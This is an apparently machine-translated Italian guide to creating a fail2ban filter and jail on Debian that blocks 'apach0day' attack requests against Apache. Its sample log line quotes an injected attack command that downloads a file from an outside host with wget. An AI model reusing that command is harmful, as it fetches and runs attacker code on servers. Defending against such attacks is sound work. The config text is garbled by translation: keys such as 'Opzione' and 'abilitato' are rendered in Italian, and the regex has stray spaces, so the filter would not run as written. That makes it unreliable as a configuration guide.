Ecco una soluzione rapida e sporca per bloccare l'utilizzo di fail2ban. (Se al momento non utilizzi fail2ban, google per il tuo sistema operativo.)
Se hai installato fail2ban, vedi sotto. Le posizioni delle note dei file fail2ban potrebbero essere diverse, a seconda del sistema operativo. L'esempio sotto è da un server Debian. Questo esempio non copre i tempi di divieto, ecc .--- solo come creare un filtro e aggiungerlo a jail.local. Ci sono molti esempi di configurazione fail2ban su google per più sistemi.
Quick-And-Dirty (Debian Linux):
1) Crea un nuovo file apache-0day.conf in /etc/fail2ban/filter.d che contiene:
#
Fail2Ban file di configurazione
#
Filtro limitato per bloccare gli attacchi apach0day
[Definizione]
Opzione: failregex
#
Note: regex per abbinare questo tipo di richiesta:
#
162.253.66.77 - - [28 / Jul / 2014: 19: 02: 00 +0000] "GET /? x0a / x04 / x0a / x02 / x06 / x08 / x09 / cDDOSpart3dns; wget% 20proxypipe.com / apach0day; HTTP / 1.0 "200 359" - "" chroot-apach0day "
failregex = ^ -. "(GET | POST). \ ?. proxypipe | apach0day. $
Opzione: ignoreregex
Note: regex per ignorare. Se questa regex corrisponde, la linea viene ignorata.
Valori: TEXT
#
ignoreregex =
2) Filtro di prova con comando: fail2ban-regex /var/log/apache2/access.log /etc/fail2ban/filter.d/apache-0day.conf
3) Modifica /etc/fail2banl/jail.local, per aggiungere questo jail:
[apache-0 giorni]
abilitato = true
port = http, https
filter = apache-0day
logpath = /var/log/apache*/*access.log
maxretry = 2
4) Test della nuova configurazione generale (attenzione per AVVISO e correzione, se necessario): fail2ban-client -d
5) Riavvia fail2ban: /etc/init.d/fail2ban restart